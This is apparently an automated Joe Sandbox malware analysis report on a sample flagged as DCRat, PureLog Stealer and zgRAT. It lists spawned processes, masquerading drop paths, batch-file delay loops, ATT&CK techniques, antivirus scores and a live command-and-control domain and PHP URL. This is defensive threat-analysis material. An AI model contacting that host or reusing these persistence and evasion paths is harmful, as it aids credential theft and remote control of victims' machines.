Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ge8uHQboyx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OTvWQnNRQU.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"

Source: C:\Users\user\Desktop\67VB5TS184.exe	Queries volume information: C:\Users\user\Desktop\67VB5TS184.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\67VB5TS184.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.2074513502.00000000131FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 67VB5TS184.exe PID: 6628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WinStore.App.exe PID: 2556, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 67VB5TS184.exe, type: SAMPLE
Source: Yara match	File source: 0.0.67VB5TS184.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2039311964.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 67VB5TS184.exe, type: SAMPLE
Source: Yara match	File source: 0.0.67VB5TS184.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.2074513502.00000000131FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 67VB5TS184.exe PID: 6628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WinStore.App.exe PID: 2556, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 67VB5TS184.exe, type: SAMPLE
Source: Yara match	File source: 0.0.67VB5TS184.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2039311964.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 67VB5TS184.exe, type: SAMPLE
Source: Yara match	File source: 0.0.67VB5TS184.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	11 Process Injection	142 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
67VB5TS184.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
67VB5TS184.exe	56%	Virustotal		Browse
67VB5TS184.exe	100%	Avira	HEUR/AGEN.1323342
67VB5TS184.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\rfQPUbaSjc.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\OTvWQnNRQU.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\HY3kVmQ00V.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\ge8uHQboyx.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\zd3m5m79sA.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\DhBojCdn.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\DTgFmlup.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\IJkognUh.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\Q8sISb3ARb.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\BJKEmTPo.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\lRXC83nrKa.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\wtO4vJVMF8.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\2ucUGghGnf.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\DTgFmlup.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\HGMGgHJP.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\FgXXGzqG.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\IJkognUh.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\EDFigHLC.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BJKEmTPo.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DTgFmlup.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DdlpkQmL.log	25%	ReversingLabs
C:\Users\user\Desktop\DhBojCdn.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\EDFigHLC.log	8%	ReversingLabs
C:\Users\user\Desktop\EVFwVPZl.log	25%	ReversingLabs
C:\Users\user\Desktop\FgXXGzqG.log	8%	ReversingLabs
C:\Users\user\Desktop\GJkyKHuU.log	25%	ReversingLabs
C:\Users\user\Desktop\HGMGgHJP.log	8%	ReversingLabs
C:\Users\user\Desktop\IJkognUh.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\JNwXPUdL.log	25%	ReversingLabs
C:\Users\user\Desktop\JTcevqgv.log	8%	ReversingLabs
C:\Users\user\Desktop\LPiGkDiH.log	8%	ReversingLabs
C:\Users\user\Desktop\MhOXPBbk.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\MpypukBp.log	25%	ReversingLabs
C:\Users\user\Desktop\OJgNpsGn.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\OlLEhJlc.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\PetFAjEL.log	25%	ReversingLabs
C:\Users\user\Desktop\RhNXkKhf.log	25%	ReversingLabs
C:\Users\user\Desktop\RpfWQkOw.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RwkTfkwc.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TzBXQCtx.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\UHGUfCbd.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\UtqvUxyo.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\VtdtDXyC.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\WQhnzdgR.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\YEdCGdin.log	8%	ReversingLabs
C:\Users\user\Desktop\YxKDZEBV.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\dWzlEqNV.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\dwnaKsIT.log	8%	ReversingLabs
C:\Users\user\Desktop\iKDhQNdY.log	8%	ReversingLabs
C:\Users\user\Desktop\inwSqFnU.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\jwizTxuZ.log	8%	ReversingLabs
C:\Users\user\Desktop\kdUIYmJG.log	25%	ReversingLabs
C:\Users\user\Desktop\krQkZgRp.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\nfGqtVNB.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\pAmkddqh.log	8%	ReversingLabs
C:\Users\user\Desktop\qdPghqvM.log	25%	ReversingLabs
C:\Users\user\Desktop\rRFIZzDC.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\uajAJJWW.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\wOaGdxSj.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\wQvXwsjz.log	8%	ReversingLabs
C:\Users\user\Desktop\wYfqbcKE.log	25%	ReversingLabs
C:\Users\user\Desktop\whTRrWrT.log	25%	ReversingLabs
C:\Users\user\Desktop\xevZNWFO.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ybRYxLPz.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\zNBzlFlK.log	8%	ReversingLabs
C:\Users\user\Desktop\zssgqxCT.log	25%	ReversingLabs
C:\Windows\SysWOW64\sr-Latn-RS\hjAOLvfTLePJensZtANoSVrh.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://649521cm.renyash.ru/	100%	Avira URL Cloud	malware
http://649521cm.renyash.ru	100%	Avira URL Cloud	malware
https://www.geoplugin.com/premium/	0%	Avira URL Cloud	safe
http://649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
649521cm.renyash.ru	104.21.38.84	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.geoplugin.com/premium/	WinStore.App.exe, 00000006.00000002.2160917992.0000000003115000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002F22000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.000000000315E000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.0000000003092000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.00000000034AE000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.000000000329C000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.0000000003708000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.0000000003455000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://649521cm.renyash.ru	WinStore.App.exe, 00000006.00000002.2160917992.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000006.00000002.2160917992.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.0000000003136000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.000000000306A000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.0000000003486000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.0000000003274000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.000000000350F000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.000000000342D000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.000000000325C000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000003A.00000002.3306289053.000000000365C000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	67VB5TS184.exe, 00000000.00000002.2072053024.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000006.00000002.2160917992.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.000000000350F000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.000000000325C000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000003A.00000002.3306289053.000000000365C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://649521cm.renyash.ru/	WinStore.App.exe, 0000003A.00000002.3306289053.000000000365C000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.38.84	649521cm.renyash.ru	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580835
Start date and time:	2024-12-26 10:21:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	59
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	67VB5TS184.exe renamed because original name is a hash value
Original Sample Name:	67247063bfbf3eedfdfd183e8235a5e8.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@100/99@1/1
EGA Information:	Successful, ratio: 8.3%
